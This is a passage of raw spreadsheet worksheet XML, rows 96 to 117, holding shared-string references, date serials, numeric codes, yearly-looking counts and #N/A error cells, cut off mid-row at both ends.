        <v>101</v>
      </c>
      <c r="G96" s="57" t="s">
        <v>1288</v>
      </c>
      <c r="H96" s="1" t="s">
        <v>1289</v>
      </c>
      <c r="I96" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J96" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K96" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L96" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M96" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N96" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O96" s="1"/>
      <c r="P96" s="1"/>
      <c r="Q96" s="1" t="s">
        <v>1292</v>
      </c>
      <c r="R96" s="83">
        <v>94742</v>
      </c>
      <c r="S96" s="83">
        <v>103735</v>
      </c>
      <c r="T96" s="83">
        <v>96125</v>
      </c>
      <c r="U96" s="83">
        <v>105138</v>
      </c>
      <c r="V96" s="83">
        <v>120505</v>
      </c>
      <c r="W96" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="97" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A97" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B97" s="51">
        <v>44252.698165682872</v>
      </c>
      <c r="C97" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="D97" s="43">
        <v>200</v>
      </c>
      <c r="E97" s="1" t="s">
        <v>1293</v>
      </c>
      <c r="F97" s="26">
        <v>200</v>
      </c>
      <c r="G97" s="1" t="s">
        <v>1288</v>
      </c>
      <c r="H97" s="1" t="s">
        <v>1289</v>
      </c>
      <c r="I97" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J97" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K97" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L97" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M97" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N97" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O97" s="1"/>
      <c r="P97" s="1"/>
      <c r="Q97" s="1" t="s">
        <v>3524</v>
      </c>
      <c r="R97" s="83">
        <v>94742</v>
      </c>
      <c r="S97" s="83">
        <v>103735</v>
      </c>
      <c r="T97" s="83">
        <v>96125</v>
      </c>
      <c r="U97" s="83">
        <v>105138</v>
      </c>
      <c r="V97" s="83">
        <v>120505</v>
      </c>
      <c r="W97" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="98" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A98" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B98" s="51">
        <v>44169.134548020833</v>
      </c>
      <c r="C98" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="D98" s="26">
        <v>104</v>
      </c>
      <c r="E98" s="1" t="s">
        <v>1296</v>
      </c>
      <c r="F98" s="26">
        <v>100</v>
      </c>
      <c r="G98" s="57" t="s">
        <v>1297</v>
      </c>
      <c r="H98" s="1" t="s">
        <v>1298</v>
      </c>
      <c r="I98" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J98" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K98" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L98" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M98" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N98" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O98" s="1"/>
      <c r="P98" s="1"/>
      <c r="Q98" s="1" t="s">
        <v>3523</v>
      </c>
      <c r="R98" s="83">
        <v>19</v>
      </c>
      <c r="S98" s="83">
        <v>2</v>
      </c>
      <c r="T98" s="83">
        <v>3</v>
      </c>
      <c r="U98" s="83">
        <v>1973</v>
      </c>
      <c r="V98" s="83">
        <v>20228</v>
      </c>
      <c r="W98" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="99" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A99" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B99" s="51">
        <v>44252.698165706017</v>
      </c>
      <c r="C99" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="D99" s="43">
        <v>200</v>
      </c>
      <c r="E99" s="1" t="s">
        <v>1296</v>
      </c>
      <c r="F99" s="26">
        <v>101</v>
      </c>
      <c r="G99" s="1" t="s">
        <v>1297</v>
      </c>
      <c r="H99" s="1" t="s">
        <v>1298</v>
      </c>
      <c r="I99" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J99" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K99" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L99" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M99" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N99" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O99" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P99" s="1"/>
      <c r="Q99" s="1" t="s">
        <v>3524</v>
      </c>
      <c r="R99" s="83">
        <v>19</v>
      </c>
      <c r="S99" s="83">
        <v>2</v>
      </c>
      <c r="T99" s="83">
        <v>3</v>
      </c>
      <c r="U99" s="83">
        <v>1973</v>
      </c>
      <c r="V99" s="83">
        <v>20228</v>
      </c>
      <c r="W99" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="100" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A100" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B100" s="51">
        <v>44057.72132099537</v>
      </c>
      <c r="C100" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="D100" s="26">
        <v>104</v>
      </c>
      <c r="E100" s="1" t="s">
        <v>1299</v>
      </c>
      <c r="F100" s="26">
        <v>100</v>
      </c>
      <c r="G100" s="57" t="s">
        <v>1300</v>
      </c>
      <c r="H100" s="1" t="s">
        <v>1301</v>
      </c>
      <c r="I100" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J100" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K100" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L100" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M100" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N100" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O100" s="1"/>
      <c r="P100" s="1"/>
      <c r="Q100" s="1" t="s">
        <v>3523</v>
      </c>
      <c r="R100" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S100" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T100" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U100" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V100" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W100" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="101" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A101" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B101" s="51">
        <v>44252.698165694441</v>
      </c>
      <c r="C101" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="D101" s="43">
        <v>200</v>
      </c>
      <c r="E101" s="1" t="s">
        <v>1302</v>
      </c>
      <c r="F101" s="26">
        <v>200</v>
      </c>
      <c r="G101" s="1" t="s">
        <v>1303</v>
      </c>
      <c r="H101" s="1" t="s">
        <v>1301</v>
      </c>
      <c r="I101" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J101" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K101" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L101" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M101" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N101" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O101" s="1"/>
      <c r="P101" s="1"/>
      <c r="Q101" s="1" t="s">
        <v>3524</v>
      </c>
      <c r="R101" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S101" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T101" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U101" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V101" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W101" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="102" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A102" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B102" s="51">
        <v>44087.123192928244</v>
      </c>
      <c r="C102" s="1" t="s">
        <v>1304</v>
      </c>
      <c r="D102" s="26">
        <v>101</v>
      </c>
      <c r="E102" s="1" t="s">
        <v>1305</v>
      </c>
      <c r="F102" s="26">
        <v>100</v>
      </c>
      <c r="G102" s="57" t="s">
        <v>1306</v>
      </c>
      <c r="H102" s="1" t="s">
        <v>1307</v>
      </c>
      <c r="I102" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J102" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K102" s="3" t="s">
        <v>12</v>
      </c>
      <c r="L102" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M102" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N102" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O102" s="1"/>
      <c r="P102" s="1"/>
      <c r="Q102" s="1" t="s">
        <v>1308</v>
      </c>
      <c r="R102" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S102" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T102" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U102" s="83">
        <v>8</v>
      </c>
      <c r="V102" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W102" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="103" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A103" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B103" s="51">
        <v>44489.668331828703</v>
      </c>
      <c r="C103" s="1" t="s">
        <v>1304</v>
      </c>
      <c r="D103" s="26">
        <v>204</v>
      </c>
      <c r="E103" s="1" t="s">
        <v>1305</v>
      </c>
      <c r="F103" s="26">
        <v>203</v>
      </c>
      <c r="G103" s="57" t="s">
        <v>1306</v>
      </c>
      <c r="H103" s="1" t="s">
        <v>1309</v>
      </c>
      <c r="I103" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J103" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K103" s="1" t="s">
        <v>12</v>
      </c>
      <c r="L103" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M103" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N103" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O103" s="1"/>
      <c r="P103" s="1"/>
      <c r="Q103" s="1" t="s">
        <v>3525</v>
      </c>
      <c r="R103" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S103" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T103" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U103" s="83">
        <v>8</v>
      </c>
      <c r="V103" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W103" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="104" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A104" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B104" s="51">
        <v>44489.668331886576</v>
      </c>
      <c r="C104" s="1" t="s">
        <v>1304</v>
      </c>
      <c r="D104" s="43">
        <v>204</v>
      </c>
      <c r="E104" s="1" t="s">
        <v>1311</v>
      </c>
      <c r="F104" s="26">
        <v>101</v>
      </c>
      <c r="G104" s="1" t="s">
        <v>1312</v>
      </c>
      <c r="H104" s="1" t="s">
        <v>1313</v>
      </c>
      <c r="I104" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J104" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K104" s="3" t="s">
        <v>12</v>
      </c>
      <c r="L104" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M104" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N104" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O104" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P104" s="1"/>
      <c r="Q104" s="1" t="s">
        <v>3525</v>
      </c>
      <c r="R104" s="83">
        <v>735</v>
      </c>
      <c r="S104" s="83">
        <v>889</v>
      </c>
      <c r="T104" s="83">
        <v>1025</v>
      </c>
      <c r="U104" s="83">
        <v>1096</v>
      </c>
      <c r="V104" s="83">
        <v>1003</v>
      </c>
      <c r="W104" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="105" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A105" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B105" s="51">
        <v>44522.394452928238</v>
      </c>
      <c r="C105" s="1" t="s">
        <v>1304</v>
      </c>
      <c r="D105" s="43">
        <v>204</v>
      </c>
      <c r="E105" s="1" t="s">
        <v>1314</v>
      </c>
      <c r="F105" s="26">
        <v>102</v>
      </c>
      <c r="G105" s="1" t="s">
        <v>1315</v>
      </c>
      <c r="H105" s="1" t="s">
        <v>1316</v>
      </c>
      <c r="I105" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J105" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K105" s="1" t="s">
        <v>12</v>
      </c>
      <c r="L105" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M105" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N105" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O105" s="1"/>
      <c r="P105" s="1"/>
      <c r="Q105" s="1" t="s">
        <v>3525</v>
      </c>
      <c r="R105" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S105" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T105" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U105" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V105" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W105" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="106" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A106" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B106" s="51">
        <v>44128.941194305553</v>
      </c>
      <c r="C106" s="1" t="s">
        <v>1304</v>
      </c>
      <c r="D106" s="43">
        <v>101</v>
      </c>
      <c r="E106" s="1" t="s">
        <v>1317</v>
      </c>
      <c r="F106" s="26">
        <v>101</v>
      </c>
      <c r="G106" s="1" t="s">
        <v>1318</v>
      </c>
      <c r="H106" s="1" t="s">
        <v>1319</v>
      </c>
      <c r="I106" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J106" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K106" s="1" t="s">
        <v>40</v>
      </c>
      <c r="L106" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M106" s="1"/>
      <c r="N106" s="1" t="s">
        <v>1320</v>
      </c>
      <c r="O106" s="1"/>
      <c r="P106" s="1"/>
      <c r="Q106" s="1" t="s">
        <v>1308</v>
      </c>
      <c r="R106" s="83">
        <v>495</v>
      </c>
      <c r="S106" s="83">
        <v>68</v>
      </c>
      <c r="T106" s="83">
        <v>89</v>
      </c>
      <c r="U106" s="83">
        <v>1482</v>
      </c>
      <c r="V106" s="83">
        <v>1423</v>
      </c>
      <c r="W106" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="107" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A107" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B107" s="51">
        <v>44489.668331851855</v>
      </c>
      <c r="C107" s="1" t="s">
        <v>1304</v>
      </c>
      <c r="D107" s="43">
        <v>204</v>
      </c>
      <c r="E107" s="1" t="s">
        <v>1317</v>
      </c>
      <c r="F107" s="26">
        <v>201</v>
      </c>
      <c r="G107" s="1" t="s">
        <v>1318</v>
      </c>
      <c r="H107" s="1" t="s">
        <v>1319</v>
      </c>
      <c r="I107" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J107" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K107" s="3" t="s">
        <v>40</v>
      </c>
      <c r="L107" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M107" s="3"/>
      <c r="N107" s="1" t="s">
        <v>1320</v>
      </c>
      <c r="O107" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P107" s="1"/>
      <c r="Q107" s="1" t="s">
        <v>3525</v>
      </c>
      <c r="R107" s="83">
        <v>495</v>
      </c>
      <c r="S107" s="83">
        <v>68</v>
      </c>
      <c r="T107" s="83">
        <v>89</v>
      </c>
      <c r="U107" s="83">
        <v>1482</v>
      </c>
      <c r="V107" s="83">
        <v>1423</v>
      </c>
      <c r="W107" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="108" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A108" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B108" s="51">
        <v>44419.612771296299</v>
      </c>
      <c r="C108" s="1" t="s">
        <v>1321</v>
      </c>
      <c r="D108" s="43">
        <v>100</v>
      </c>
      <c r="E108" s="1" t="s">
        <v>1322</v>
      </c>
      <c r="F108" s="26">
        <v>100</v>
      </c>
      <c r="G108" s="1" t="s">
        <v>1323</v>
      </c>
      <c r="H108" s="1" t="s">
        <v>1324</v>
      </c>
      <c r="I108" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J108" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K108" s="3" t="s">
        <v>18</v>
      </c>
      <c r="L108" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M108" s="3" t="s">
        <v>18</v>
      </c>
      <c r="N108" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O108" s="1"/>
      <c r="P108" s="1"/>
      <c r="Q108" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R108" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S108" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T108" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U108" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V108" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W108" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="109" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A109" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B109" s="51">
        <v>44482.344109907404</v>
      </c>
      <c r="C109" s="1" t="s">
        <v>1326</v>
      </c>
      <c r="D109" s="43">
        <v>101</v>
      </c>
      <c r="E109" s="1" t="s">
        <v>1327</v>
      </c>
      <c r="F109" s="26">
        <v>101</v>
      </c>
      <c r="G109" s="1" t="s">
        <v>1328</v>
      </c>
      <c r="H109" s="1" t="s">
        <v>1329</v>
      </c>
      <c r="I109" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J109" s="1" t="s">
        <v>1238</v>
      </c>
      <c r="K109" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L109" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M109" s="1" t="s">
        <v>1330</v>
      </c>
      <c r="N109" s="1" t="s">
        <v>522</v>
      </c>
      <c r="O109" s="1"/>
      <c r="P109" s="1"/>
      <c r="Q109" s="1" t="s">
        <v>1331</v>
      </c>
      <c r="R109" s="83">
        <v>27</v>
      </c>
      <c r="S109" s="83">
        <v>61</v>
      </c>
      <c r="T109" s="83">
        <v>27</v>
      </c>
      <c r="U109" s="83">
        <v>24</v>
      </c>
      <c r="V109" s="83">
        <v>89</v>
      </c>
      <c r="W109" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="110" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A110" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B110" s="51">
        <v>44313.458974224537</v>
      </c>
      <c r="C110" s="1" t="s">
        <v>1332</v>
      </c>
      <c r="D110" s="43">
        <v>100</v>
      </c>
      <c r="E110" s="1" t="s">
        <v>1333</v>
      </c>
      <c r="F110" s="26">
        <v>100</v>
      </c>
      <c r="G110" s="1" t="s">
        <v>1334</v>
      </c>
      <c r="H110" s="1" t="s">
        <v>1335</v>
      </c>
      <c r="I110" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J110" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K110" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L110" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M110" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N110" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O110" s="1" t="s">
        <v>1336</v>
      </c>
      <c r="P110" s="1"/>
      <c r="Q110" s="1" t="s">
        <v>3526</v>
      </c>
      <c r="R110" s="83">
        <v>23170</v>
      </c>
      <c r="S110" s="83">
        <v>49335</v>
      </c>
      <c r="T110" s="83">
        <v>25980</v>
      </c>
      <c r="U110" s="83">
        <v>29402</v>
      </c>
      <c r="V110" s="83">
        <v>36749</v>
      </c>
      <c r="W110" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="111" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A111" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B111" s="51">
        <v>44313.609465381945</v>
      </c>
      <c r="C111" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="D111" s="43">
        <v>101</v>
      </c>
      <c r="E111" s="1" t="s">
        <v>1339</v>
      </c>
      <c r="F111" s="26">
        <v>101</v>
      </c>
      <c r="G111" s="1" t="s">
        <v>1340</v>
      </c>
      <c r="H111" s="1" t="s">
        <v>1341</v>
      </c>
      <c r="I111" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J111" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K111" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L111" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M111" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N111" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O111" s="1"/>
      <c r="P111" s="1"/>
      <c r="Q111" s="1" t="s">
        <v>3527</v>
      </c>
      <c r="R111" s="83">
        <v>327517</v>
      </c>
      <c r="S111" s="83">
        <v>345337</v>
      </c>
      <c r="T111" s="83">
        <v>294764</v>
      </c>
      <c r="U111" s="83">
        <v>351097</v>
      </c>
      <c r="V111" s="83">
        <v>456909</v>
      </c>
      <c r="W111" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="112" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A112" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B112" s="51">
        <v>44495.743048506942</v>
      </c>
      <c r="C112" s="1" t="s">
        <v>1343</v>
      </c>
      <c r="D112" s="43">
        <v>121</v>
      </c>
      <c r="E112" s="1" t="s">
        <v>1344</v>
      </c>
      <c r="F112" s="26">
        <v>101</v>
      </c>
      <c r="G112" s="1" t="s">
        <v>1345</v>
      </c>
      <c r="H112" s="1" t="s">
        <v>1346</v>
      </c>
      <c r="I112" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J112" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K112" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L112" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M112" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N112" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O112" s="1" t="s">
        <v>1347</v>
      </c>
      <c r="P112" s="1"/>
      <c r="Q112" s="1" t="s">
        <v>3528</v>
      </c>
      <c r="R112" s="83">
        <v>5080</v>
      </c>
      <c r="S112" s="83">
        <v>12534</v>
      </c>
      <c r="T112" s="83">
        <v>13396</v>
      </c>
      <c r="U112" s="83">
        <v>17380</v>
      </c>
      <c r="V112" s="83">
        <v>41948</v>
      </c>
      <c r="W112" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="113" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A113" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B113" s="51">
        <v>44495.743048750002</v>
      </c>
      <c r="C113" s="1" t="s">
        <v>1343</v>
      </c>
      <c r="D113" s="43">
        <v>121</v>
      </c>
      <c r="E113" s="1" t="s">
        <v>1349</v>
      </c>
      <c r="F113" s="26">
        <v>100</v>
      </c>
      <c r="G113" s="1" t="s">
        <v>1350</v>
      </c>
      <c r="H113" s="1" t="s">
        <v>1351</v>
      </c>
      <c r="I113" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J113" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K113" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L113" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M113" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N113" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O113" s="1" t="s">
        <v>1352</v>
      </c>
      <c r="P113" s="1"/>
      <c r="Q113" s="1" t="s">
        <v>3528</v>
      </c>
      <c r="R113" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S113" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T113" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U113" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V113" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W113" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="114" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A114" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B114" s="51">
        <v>44495.743048483797</v>
      </c>
      <c r="C114" s="1" t="s">
        <v>1343</v>
      </c>
      <c r="D114" s="43">
        <v>121</v>
      </c>
      <c r="E114" s="1" t="s">
        <v>1353</v>
      </c>
      <c r="F114" s="26">
        <v>201</v>
      </c>
      <c r="G114" s="1" t="s">
        <v>1354</v>
      </c>
      <c r="H114" s="1" t="s">
        <v>1355</v>
      </c>
      <c r="I114" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J114" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K114" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L114" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M114" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N114" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O114" s="1" t="s">
        <v>1356</v>
      </c>
      <c r="P114" s="1"/>
      <c r="Q114" s="1" t="s">
        <v>3528</v>
      </c>
      <c r="R114" s="83">
        <v>745</v>
      </c>
      <c r="S114" s="83">
        <v>699</v>
      </c>
      <c r="T114" s="83">
        <v>607</v>
      </c>
      <c r="U114" s="83">
        <v>534</v>
      </c>
      <c r="V114" s="83">
        <v>621</v>
      </c>
      <c r="W114" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="115" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A115" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B115" s="51">
        <v>44505.681300208336</v>
      </c>
      <c r="C115" s="1" t="s">
        <v>1357</v>
      </c>
      <c r="D115" s="26">
        <v>100</v>
      </c>
      <c r="E115" s="1" t="s">
        <v>1358</v>
      </c>
      <c r="F115" s="26">
        <v>100</v>
      </c>
      <c r="G115" s="1" t="s">
        <v>1359</v>
      </c>
      <c r="H115" s="1" t="s">
        <v>1360</v>
      </c>
      <c r="I115" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J115" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K115" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L115" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M115" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N115" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O115" s="1"/>
      <c r="P115" s="1"/>
      <c r="Q115" s="1" t="s">
        <v>3529</v>
      </c>
      <c r="R115" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S115" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T115" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U115" s="83">
        <v>80</v>
      </c>
      <c r="V115" s="83">
        <v>79</v>
      </c>
      <c r="W115" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="116" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A116" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B116" s="51">
        <v>44505.681300277778</v>
      </c>
      <c r="C116" s="1" t="s">
        <v>1357</v>
      </c>
      <c r="D116" s="26">
        <v>100</v>
      </c>
      <c r="E116" s="1" t="s">
        <v>1362</v>
      </c>
      <c r="F116" s="26">
        <v>100</v>
      </c>
      <c r="G116" s="1" t="s">
        <v>1363</v>
      </c>
      <c r="H116" s="1" t="s">
        <v>1364</v>
      </c>
      <c r="I116" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J116" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K116" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L116" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M116" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N116" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O116" s="1"/>
      <c r="P116" s="1"/>
      <c r="Q116" s="1" t="s">
        <v>3529</v>
      </c>
      <c r="R116" s="83">
        <v>67</v>
      </c>
      <c r="S116" s="83">
        <v>418</v>
      </c>
      <c r="T116" s="83">
        <v>223</v>
      </c>
      <c r="U116" s="83">
        <v>647</v>
      </c>
      <c r="V116" s="83">
        <v>975</v>
      </c>
      <c r="W116" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="117" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A117" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B117" s="51">
        <v>44505.681300266202</v>
      </c>
      <c r="C117" s="1" t="s">
        <v>1357</v>
      </c>
      <c r="D117" s="26">
        <v>100</v>
      </c>
      <c r="E117" s="1" t="s">
        <v>1365</v>
      </c>
      <c r="F117" s="26">
